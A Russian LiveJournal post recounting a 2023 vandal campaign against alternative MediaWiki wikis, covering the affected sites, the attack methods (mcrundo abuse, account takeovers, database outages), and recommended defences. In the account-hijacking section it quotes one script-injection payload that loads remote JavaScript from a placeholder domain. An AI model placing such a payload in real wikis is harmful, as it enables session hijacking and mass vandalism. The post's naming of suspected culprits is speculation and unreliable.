Post Friends My journal
bl_almalexia

Хроники февральского дятла

Jun 09, 2023 22:50


Февральский вандал (февральский дятел, евро-дятел) - новый вид дятла, замеченный в феврале 2023 года в различных альтернативных вики-проектах. От дятлов и вандалов предыдущих эпох отличается чрезвычайной гибкостью и хакерской направленностью атак, использующих различные уязвимости MediaWiki. Было атаковано более 5 известных проектов. На данный момент два известных вики-проекта не смогли оправиться от атаки данного дятла и находятся на пути к БАО. С точки зрения теории неизбежного устаревания в будущем евро-дятел несёт фундаментальную угрозу альтернативной вики-среде и может привести к её полному исчезновению.



Дятел оставлял эту картинку как свой автограф

Содержание

Атакованные проекты



Альтернативные вики-проекты, атакованные февральским вандалом   Проект Дата атаки Метод атаки Результат   Русский эксперт Начало февраля Взлом учетных записей После недели неработы атака отбита, проект жив   Викиреальность Начало февраля Взлом учетных записей Проект погружён в БАО и неактивен   Традиция Середина февраля MCR-атака Вандализм быстро отражён, проект жив   ALL Середина февраля Взлом учетных записей Атака быстро отбита, проект жив, но окуклен: закрыта регистрация новых учёток и запрещено анонимное редактирование   Циклопедия Середина февраля MCR-атака Вандализм отражен, проект жив   Wikitropes 11 февраля, 23-24 февраля MCR-атака и атака на балансер MCR-атака отбита 23 февраля, вечером 24 февраля сайт поднялся после атаки на балансер   Posmotreli.su 24 февраля Атака на балансер Наблюдались перебои в работе проекта

Предположительно, была атакована и сама Википедия: Википедия:Форум/Новости#В работе «Википедии» произошел сбой.

В самом начале февраля в Неолурке также была зарегистрирована DDoS-атака на протяжении нескольких часов в виде массовых загрузок рандомных страниц с использованием какого-то бота. В результате была достигнута некоторая загрузка процессора, из-за чего сайт стал открываться медленнее, но падения базы данных или отказа сайта не произошло. Значимых вандальных атак не произошло из-за использования MediaWiki 1.37.1, в которой критических ошибок не найдено, а также капчи,сильно осложняющей анонимный вандализм.

Способы защиты

Основным рекомендуемым способом защиты от февральского вандала является:

  • обновление MediaWiki до последней версии либо устранение уязвимостей через патчи безопасности
  • отключение редактирования JS-страниц
  • смена старых паролей участников на уникальные
  • использование современных операционных систем
  • отказ от открытия файлов из неизвестных источников или подозрительных форматов, отключение автооткрытия вложений в почте
  • для защиты от балансер-атаки можно использовать фильтры и фаерволы (правда, в основном платные), подрубить капчу: эффективность защиты сомнительна, так как даже после принятия указанных мер на Posmotreli.su атака продолжилась
Типы атак

Способы, которыми февральский дятел атакует проекты, регулярно мутируют, что вызывает определённое беспокойство. Так, после того, как дятлу был дан серьёзный отпор в Циклопедии, дятел сконцентрировался на проекте Wikitropes и неким образом вызвал отказ в базе данных. Каким образом дятлу это удалось, остаётся вопросом, но тем не менее о некоторых других методах или хотя бы общих признаках атаки мы уже знаем.

MCR-атака

Евро-дятел часто использует уязвимость старых версий MediaWiki (mcrundo), благодаря которой может с огромной скоростью вайпать даже защищённые страницы в обход фильтров, капчи и чего угодно. Для защиты от этого вектора атаки стоит отключить функцию mcrundo на вики-проекте, или обновиться до версии 1.37 и более старшей.

Взлом паролей и учётных записей



Дятлаж после взлома учётки администратора во время его активности

Точно неизвестно, каким образом евро-дятел производит взлом учётных записей, но, видимо, этой атаке так же подвержены именно старые вики-движки. Самым брутальным образом оказалась одятлена Викиреальность, где многократная смена паролей так и не помогла удержать волну атаки со всех возможных активных учётных записей. Из-за взлома вандализм начинает идти непосредственно с компьютера заражённого, любое присутствие на сайте порождает долбняк.

На некоторых сайтах, например Традиции, использовалась уязвимость парсера, которая позволяла вставить произвольный JS-код с использованием конструкции [[#%3Cscript%3E$.getScript('//domain.domain/adres')%3C/script%3E| - она не экранировалась должным образом. Эта уязвимость отсутствует в движке версии 1.37 и более поздних версиях.

Атака на балансер

Евро-дятел оказался способен вызывать временные и постоянные отключения базы данных. После MCR-атаки на проект Wikitropes дятел изменил тактику и применил до сих пор не известную методологию. В итоге база данных проекта была атакована и отключилась, таким образом сайт недоступен и выдает внутреннюю ошибку «/LoadBalancer.php: Cannot access the database».

Атаке на балансер подвержены вики-проекты с любой версией MediaWiki, применение капчи и Cloudflare не защищают проект от дятла. Методы противодействия уточняются. Рекомендуется использование скриптов, автоматически поднимающих базу данных в случае её падения: в случае использования такого скрипта даже успешная атака не приведет к долговременному падению сайта.



Внутренняя ошибка на Викитропах после атаки



Шаг 1: Posmotreli.su, отказ базы данных



Шаг 2: Posmotreli.su, сайт ложится целиком

Теория неизбежного устаревания

Критическая ситуация для альтернативных вики-проектов может сложиться, если евро-дятел найдёт уязвимости в последних продакшн-версиях или в еще не опубликованной в продакшн альфа-версии. Самая новая версия MediaWiki используется только в проектах Викимедиа (на данный момент это 1.40), а для широкого использования в других вики-проектах (в том числе альтернативных) версия на поколение вперед (например, 1.40.x против 1.39.x) становится доступна лишь через полгода после первоначальной обкатки и отладки на проектах Викимедиа.

Допустим, в нашем случае последняя продакшн-версия - 1.39.2, а последняя альфа-версия - 1.40.1. В ситуации, если дятел потенциально находит уязвимость в 1.39.2 и атакует альтернативный вики-проект с этой версией движка, обновиться на более новую версию уже не получится, так как альфа-версии ещё нет в доступе. Даже если в проекте произойдёт обновление на эту альфа-версию из Git'а, это приведёт к огромному количеству лагов и, как ни парадоксально, опять уязвимостей. Использование альфа-версии без обширной команды поддерживающих специалистов, которые есть у Викимедиа, приведёт к провалу.

Альтернативные вики-проекты, как пользователи продакшн-версий MediaWiki без мейнтейнеров, попадают в ловушку неизбежного устаревания своего ПО (inevitable deprecation), поскольку их администраторы не смогут быстро предлагать патчи по защите от атак и будут вынуждены ждать патчей безопасности через месяц или даже полгода после атаки. При таком гипотетическом развитии событий евро-дятел уничтожит альтернативную вики-среду на корню, поскольку единственным двигателем жизненного цикла MediaWiki является фонд Викимедиа.

Интересные факты

  • Дятел использовал отсылки к давно неактивной организации вики-вандалов РАОрг.
  • Активность этого дятла зарегистрирована после начала активности аккаунта Iscorka, в частности на Русском эксперте дятел ударил спустя несколько дней после начала активности этой учётки; сам Iscorka отметился рассылкой сомнительных файлов и запросом административных флагов на ряде сайтов, в том числе критических флагов. И ранее регистрировались массовые вандальные атаки после появления Iscorka, например от лица давно покинувшего все википроекты Russian Nature. Что как бы намекает.В октябре 2022 года в Торадицийо немедленно после начала активности Iscorka состоялся масштабный дятловандализм, затронувший тысячи статей несмотря на наличие на сайте каптчи от Google (видимо, уже тогда был произведён её обход с использованием MCR-атаки). Вандал действовал грамотно - делал две правки с разных аккаунтов, чтобы сделать невозможным быстрый откат. Был побеждён закачкой бекапа.[1]
  • Wikitropes принципиально не использовали https до атаки дятла, но его появление заставило админа пошевелиться и все-таки настроить https.
  • Примерно в то же время Фикбук тоже пострадал: наблюдался массированный спам через публичную бету, сборники и токены работ привёл к локальному самоогораживанию проекта, публичная бета полностью отключена. Однако, этот вандализм взял на себя некий анимешник perdub, а также хакер 8hoursking, которого потом приняли на работу официально. Про вики или атаки на них в обоих пабликах ничего не говорится, так что это только совпадение.[2][3]
  • Февральский вандал - это кто-то известный в викисреде. Возможно, это Золотой Парень или даже Russian Nature (Природ).

Leave a comment

Read comments 1
Previous post Next post
Up
Homepage Read journal... Full version Help Русская версия
© 1999-2024 LiveJournal, Inc.